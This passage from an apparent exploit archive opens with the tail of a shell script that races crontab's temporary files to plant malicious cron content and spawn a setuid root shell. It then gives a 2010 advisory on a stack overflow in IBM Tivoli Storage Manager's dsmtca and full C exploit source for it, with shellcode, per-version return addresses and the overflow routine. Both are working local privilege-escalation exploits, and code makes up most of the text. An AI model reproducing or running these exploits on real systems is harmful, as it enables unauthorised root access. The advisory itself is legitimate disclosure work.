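		echo -ne "\r[?] Doing cycle $X of $CYCLES [$[X*100/CYCLES]% done]... "
		umask 0
		( ( crontab /dev/urandom & usleep 1000; killall crontab ) & ) &>/dev/null
	done
	sleep 3;killall -9 crontab &>/dev/null
	echo
	echo "[+] Setup complete, /var/spool/cron filled with junk tmp files."
	CNT=0
	echo "[*] Now, doing cleanup and counting the nodes..."
	for i in 1 2 3 4 5 6 7 8 9; do
		for j in /var/spool/cron/tmp.${i}*; do
			# an unmatched glob is left as the literal pattern: skip it
			# instead of "cleaning" a nonexistent node and counting it
			[ -e "$j" ] || continue
			echo -n >$j
			echo -ne "\r[+] Node $CNT clean... "
			CNT=$[CNT+1]
		done
	done
	echo
	PROB=$[CNT*100/32768]
	echo "[+] Found $CNT nodes, approx. $PROB% chance..."
	if [ "$CNT" -lt "$[CYCLES*2/3]" ]; then
		echo "[-] Less than 66% of expected nodes were created. Try adjusting the exploit."
		echo
		exit 1
	fi
else
	echo "[?] Skipping /var/spool/cron initialization. Results might be unpredictable."
fi
echo "[+] Now I will wait for $DESTUSER to edit his crontab. Could take some time."
chmod 755 /tmp/.rootcron
while :; do
	sleep 1
	# Poll for a crontab process owned by the victim; columns 10-15 of the
	# "ps aux" output are assumed to hold the pid.
	GOT="`ps auxhw|grep ^$DESTUSER|grep crontab|grep -v grep|cut -b10-15|head -1`"
	test "$GOT" = "" && continue
	GOT=`echo $GOT`
	echo "[+] Caught victim at pid $GOT..."
	if [ ! -f /var/spool/cron/tmp.$GOT ]; then
		echo "[-] DAMN! We have no node for this pid, bad luck..."
		continue
	fi
	echo '[+] Got this node :) Entering event wait loop...'
	export DESTUSER
	# Hold the victim's node open, wait for the crontab process to go away,
	# then overwrite the node through our still-open descriptor.
	(
		G=blabla
		while [ ! "$G" = "" ]; do
			G="`ps auxhw|grep ^$DESTUSER|grep crontab|grep -v grep`"
		done
		sleep 1
		echo "[+] Bingo! It happened. Now writing our evil content..." 1>&2
		./dowrite
	) >/var/spool/cron/tmp.$GOT
	# Install and remove a crontab of our own so the daemon rescans the spool.
	echo '* * * * * /bin/true' >.ctab
	echo "[+] Evil content written. Trying to rehash the daemon..."
	crontab .ctab
	crontab -r
	echo "[+] Entering event loop waiting for exploit to work..."
	while [ ! -u /tmp/.r00tcr0n ]; do
		sleep 1
	done
	rm -f .ctab dowrite dowrite.c /tmp/.rootcron root.c
	echo "[+] Calling the main code..."
	/tmp/.r00tcr0n
	echo "[*] Thank you for choosing Marchew Industries."
	echo
	exit 1
done
# milw0rm.com [2000-11-21]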
Kryptos Logic/IBM Tivoli Storage Manager (TSM) Local Root ( linux)
http://www.kryptoslogic.com/advisories/2010/kryptoslogic-ibm-tivoli-dsmtca.txt
http://www.kryptoslogic.com/advisories/2010/kryptoslogic-ibm-tivoli-dsmtca-exploit.c
==-===-=====-=======-===========-=============-=================
IBM Tivoli Storage Manager (TSM) Local Root
Kryptos Logic, December 2010
==-===-=====-=======-===========-=============-=================
=====[ Timeline
Vendor Contacted...........: 2009-12-14
Fix from Vendor............: 2010-12-14
Advisory Published.........: 2010-12-15
=====[ Affected Versions
Vulnerable:
IBM TSM 6.1: 6.1.0.0 through 6.1.3.0
IBM TSM 5.5: 5.5.0.0 through 5.5.2.7
IBM TSM 5.4: 5.4.0.0 through 5.4.3.3
IBM TSM 5.3: 5.3.0.0 through 5.3.6.7
- Potentially older versions of IBM TSM dsmtca
Not vulnerable:
IBM TSM 6.1.4
IBM TSM 5.5.3
IBM TSM 5.4.3.4
IBM TSM 5.3.6.10
See IBM advisory IC65491 for details:
http://www.ibm.com/support/docview.wss?uid=swg21454745
=====[ Vulnerability
When IBM TSM communicates with the setuid-root backup client
dsmtca, it does so over pipes whose descriptor numbers are passed on
dsmtca's command line, so any local user can start dsmtca with pipes of
their own and feed it arbitrary messages. The function
GeneratePassword() reads a one-byte length from the pipe and then that
many bytes into a fixed-size stack buffer without checking the length
against the buffer - a classic stack-based buffer overflow that makes
local code execution as root possible.
=====[ Exploitation
dsmtca copies the LANG environment variable to a fixed location in
memory (the `Locale` object in the binary's .data section; the address
appears to be stable because the binary is not position-independent -
see the absolute addresses in the exploit's version table). An attacker
can therefore achieve arbitrary code execution by placing shellcode in
the variable and then overwriting the return address of
GeneratePassword() with the known address the value is copied to; no
stack address needs to be guessed.
=====[ Credits
Discovered by Peter Wilhelmsen and Daniel Kalici, Kryptos Logic.
Exploit developed by Peter Wilhelmsen and Morten Shearman
Kirkegaard, Kryptos Logic.
=====[ About Kryptos Logic
Kryptos Logic is a group of talented computer security experts
from around the globe that has coalesced into a highly effective
team. We provide a wide range of security products, from
binary analysis and intrusion management systems to anti-piracy and
digital rights management software. We also perform
state-of-the-art research on emerging attack vectors and threats
to current digital infrastructure.
http://www.kryptoslogic.com/
Exploit:
/*
* IBM Tivoli Storage Manager 6.1 - Local Root in DSMTCA GeneratePassword
* Copyright (C) 2009-2010 Kryptos Logic
*
* Bug discovered by Peter Wilhelmsen and Daniel Kalici.
* Exploit by Peter Wilhelmsen and Morten Shearman Kirkegaard.
*
* http://www.kryptoslogic.com/advisories/2010/kryptoslogic-ibm-tivoli-dsmtca.txt
* http://www.kryptoslogic.com/advisories/2010/kryptoslogic-ibm-tivoli-dsmtca-exploit.c
*/
#include <stdio.h>
#include <errno.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <signal.h>
#include <inttypes.h>
/*
 * Linux/x86 payload (int 0x80 system calls), decoded by inspection:
 *   setreuid(0, 0)       xor eax/ebx/ecx ; mov al,0x46 ; int 0x80
 *   execve("/bin/sh", ["/bin/sh", NULL], NULL)
 *                        jmp/call trick locates the trailing "/bin/sh",
 *                        NUL-terminates it, builds argv/envp right after
 *                        it ; mov al,0x0b ; int 0x80
 *   exit(0)              reached only if execve() fails
 * Contains no NUL byte, so it survives as a C string in the environment.
 * exploit() places it in LANG; dsmtca copies LANG to the fixed address
 * that versions[].retaddr names, which is where execution is redirected.
 */
char shellcode[] =
"\x31\xc0\x31\xdb\x31\xc9\xb0\x46\xcd\x80\xeb\x1d"
"\x5e\x88\x46\x07\x89\x46\x0c\x89\x76\x08\x89\xf3"
"\x8d\x4e\x08\x8d\x56\x0c\xb0\x0b\xcd\x80\x31\xc0"
"\x31\xdb\x40\xcd\x80\xe8\xde\xff\xff\xff/bin/sh";
/*
 * Positions in the argv[] vector handed to dsmtca by exploit(): each
 * enumerator is the index of one argument, tcaTerminate is the slot that
 * holds the NULL terminator and tcaArgCount sizes the array.  The names are
 * the exploit authors' labels for what dsmtca appears to expect in each
 * position; only the program path and the four pipe descriptors are
 * actually computed by the code here, the rest are fixed strings.
 */
enum arguments {
tcaProgramPath,
tcaDebugStop,
tcaAlertString,
tcaPipe0,
tcaPipe1,
tcaPipe2,
tcaPipe3,
tcaPswdFileName,
tcaLang,
tcaErrorLog,
tcaDsDir,
tcaRequest,
tcaSessID,
tcaServerName,
tcaPasswordFile,
tcaPasswordDir,
tcaBuildData,
tcaBuildTime,
tcaCliType,
tcaTraceTrusted,
tcaClusterEnabl,
tcaCryptoType,
tcaTerminate,
tcaArgCount
};
/* Find the buflen (56 in this case) in GeneratePassword().
*
* .text:0805B056 _Z16GeneratePasswordhiiP12pswdFileInfoPcS1_S1_S1_S1_ proc near
* ...
* .text:0805B155 lea eax, [ebp-56]
* .text:0805B158 mov [esp+4], eax ; buf
* .text:0805B15C mov [esp], edi ; fd
* .text:0805B15F call _read
*
*
* Set the retaddr (0x083C7100 in this case) to the Locale export.
*
* .data:083C7100 Locale db 55h dup(0) ; DATA XREF: .got:Locale_ptro
*/
/*
 * Per-build parameters.  buflen is the distance in bytes from the read()
 * destination to the saved frame pointer (the lea operand above); retaddr
 * is the address of the Locale export, where dsmtca copies LANG according
 * to the advisory text, and hence where the shellcode ends up.  Addresses
 * are absolute 32-bit values, so the table presumably only holds for the
 * non-PIE i386 builds listed.  NULL-terminated on name; walked by usage()
 * and main().
 */
struct {
char *name;
int buflen;
uint32_t retaddr;
} versions[] = {
{ "5.5.1.4-linux-i386", 40, 0x0826E7E0 },
{ "5.5.2.0-linux-i386", 40, 0x08278180 },
{ "6.1.0.0-linux-i386", 56, 0x08356520 },
{ "6.1.3.0-linux-i386", 56, 0x083C7100 },
{ NULL }
};
/*
 * Fork and exec argv[0] with argv as its argument vector; returns to the
 * caller in the parent only.  SIGCHLD is set to SIG_IGN in the parent so the
 * child is reaped automatically.  In the child a fixed set of signals is
 * ignored before exec; presumably so that the target inherits those
 * dispositions (SIG_IGN survives execv) and e.g. a closed pipe does not kill
 * it.  Exits the calling process on fork() failure and the child on execv()
 * failure.
 */
void SpawnTask(char *argv[])
{
	static const int ignored[] = {
		SIGINT, SIGTERM, SIGQUIT, SIGPIPE,
		SIGSEGV, SIGXFSZ, SIGTSTP, SIGABRT
	};
	size_t i;

	signal(SIGCHLD, SIG_IGN);

	switch (fork()) {
	case -1:
		perror("fork() failed");
		exit(EXIT_FAILURE);
	case 0:
		/* child: fall out of the switch and exec */
		break;
	default:
		/* parent */
		return;
	}

	for (i = 0; i < sizeof ignored / sizeof ignored[0]; i++)
		signal(ignored[i], SIG_IGN);

	execv(argv[0], argv);
	perror("execv() failed");
	exit(EXIT_FAILURE);
}
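/*
 * Write exactly n bytes to fd, retrying on EINTR and short writes.  Exits
 * with a diagnostic on error, so a dsmtca that died early is reported
 * instead of the protocol silently continuing against a closed pipe.
 */
static void send_bytes(int fd, const void *buf, size_t n)
{
	const unsigned char *p = buf;

	while (n > 0) {
		ssize_t w = write(fd, p, n);
		if (w < 0) {
			if (errno == EINTR)
				continue;
			perror("write() to dsmtca failed");
			exit(EXIT_FAILURE);
		}
		p += w;
		n -= (size_t)w;
	}
}

/*
 * Drive dsmtca through its pipe protocol and overflow the GeneratePassword()
 * stack buffer for the selected build.
 *
 * v: index into versions[]; main() has already validated it.
 *
 * Wire layout, from the disassembly notes above versions[]: the read()
 * target sits at [ebp-buflen], so buflen filler bytes reach the saved ebp,
 * four more cover it, and the final four bytes land on the saved return
 * address -> payload length = buflen + 8.  The return address points at the
 * Locale export, where dsmtca copies LANG (per the advisory; the copy is not
 * visible here), so LANG carries the shellcode.  The exploit is local, so the
 * host's byte order is the target's when the address is written out.
 *
 * Fixes over the original: the length bound is checked before the value is
 * truncated to the one-byte wire field (a buflen >= 248 used to slip past
 * the check); setenv()'s third argument is the overwrite flag, not a
 * length; the return address is stored with memcpy rather than an
 * unaligned uint32_t store; writes are checked; SIGPIPE is ignored in the
 * parent so a dead child yields EPIPE instead of killing the exploit.
 */
void exploit(int v)
{
	int pfd[2];      /* us -> dsmtca */
	int cfd[2];      /* dsmtca -> us */
	char p0[16];
	char p1[16];
	char p2[16];
	char p3[16];
	char buffer[64];
	uint8_t len;     /* the length field is a single byte on the wire */
	uint32_t retaddr = versions[v].retaddr;
	char *args[tcaArgCount];

	/* buflen + 8 must fit in buffer (and therefore also in one byte) */
	if (versions[v].buflen + 8 > (int)sizeof(buffer)) {
		fprintf(stderr, "versions[%d].buflen > %d\n",
			v, (int)sizeof(buffer));
		exit(EXIT_FAILURE);
	}
	len = (uint8_t)(versions[v].buflen + 8);

	/* the shellcode travels to dsmtca in the environment; 1 == overwrite */
	if (setenv("LANG", shellcode, 1) != 0) {
		perror("setenv() failed");
		exit(EXIT_FAILURE);
	}

	if ((pipe(pfd) == -1) || (pipe(cfd) == -1)) {
		perror("pipe() failed");
		exit(EXIT_FAILURE);
	}
	/* dsmtca receives its pipe ends as decimal descriptor numbers in argv */
	snprintf(p0, sizeof p0, "%d", pfd[0]);
	snprintf(p1, sizeof p1, "%d", pfd[1]);
	snprintf(p2, sizeof p2, "%d", cfd[0]);
	snprintf(p3, sizeof p3, "%d", cfd[1]);

	args[tcaProgramPath ] = "/opt/tivoli/tsm/client/ba/bin/dsmtca";
	args[tcaDebugStop ] = "0";
	args[tcaAlertString ] = "TCA Interr\bfacee\b ADSM Release 3";
	args[tcaPipe0 ] = p0;
	args[tcaPipe1 ] = p1;
	args[tcaPipe2 ] = p2;
	args[tcaPipe3 ] = p3;
	args[tcaPswdFileName] = "/etc/adsm/TSM.PWD";
	args[tcaLang ] = "/opt/tivoli/tsm/client/lang/en_US/dsmclientV3.cat";
	args[tcaErrorLog ] = "/var/log/dsmerror.log";
	args[tcaDsDir ] = "/opt/tivoli/tsm/client/ba/bin";
	args[tcaRequest ] = "C";
	args[tcaSessID ] = "NODE";
	args[tcaServerName ] = "SERVER";
	args[tcaPasswordFile] = "/etc/adsm/TSM.PWD";
	args[tcaPasswordDir ] = "";
	args[tcaBuildData ] = "AASATRG";
	args[tcaBuildTime ] = "DMESEEG";
	args[tcaCliType ] = "";
	args[tcaTraceTrusted] = "0";
	args[tcaClusterEnabl] = "0";
	args[tcaCryptoType ] = "1";
	args[tcaTerminate ] = (char *)NULL;
	SpawnTask(args);

	/* parent keeps only its own ends of the two pipes */
	close(pfd[0]);
	close(cfd[1]);
	/* a dsmtca that already exited must show up as EPIPE, not SIGPIPE */
	signal(SIGPIPE, SIG_IGN);

	/* 0805A7BD call _read( fd, buf, 1 ) */
	send_bytes(pfd[1], "\x41", 1);
	/* 0805A7DD call _read( fd, var_AAA, 1 ) */
	send_bytes(pfd[1], "\x41", 1);
	/* 0805A7FD call _read( fd, var_5BB, 1 ) */
	send_bytes(pfd[1], &len, 1);
	/* 0805A824 call _read( fd, var_28, var_5BB ) */
	memset(buffer, 'A', sizeof(buffer));
	memcpy(buffer + len - 4, &retaddr, sizeof retaddr);
	send_bytes(pfd[1], buffer, len);

	/* read the response, needed to make GeneratePassword() return */
	if (read(cfd[0], buffer, sizeof(buffer)) < 0)
		perror("read() from dsmtca failed");

	close(pfd[1]);
	close(cfd[0]);
}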
/*
 * Print the command synopsis to stderr, followed by one supported version
 * string per line (the name column of versions[], up to the NULL sentinel).
 * path: argv[0] of the running program, echoed in the synopsis.
 */
void usage(char *path)
{
	int i = 0;

	fprintf(stderr, "Usage: %s version\n\nWhere \"version\" is one of:\n", path);
	while (versions[i].name != NULL) {
		fprintf(stderr, "%s\n", versions[i].name);
		i++;
	}
}
/*
 * Entry point.  Exactly one argument is expected: the version string of the
 * target build, matched byte-for-byte against versions[].name.  On a match
 * exploit() is run for that entry and the program exits successfully; any
 * other invocation prints the usage text and fails.
 */
int main(int argc, char *argv[])
{
	int i;

	if (argc == 2) {
		for (i = 0; versions[i].name != NULL; i++) {
			if (strcmp(versions[i].name, argv[1]) != 0)
				continue;
			exploit(i);
			return EXIT_SUCCESS;
		}
	}
	usage(argv[0]);
	return EXIT_FAILURE;
}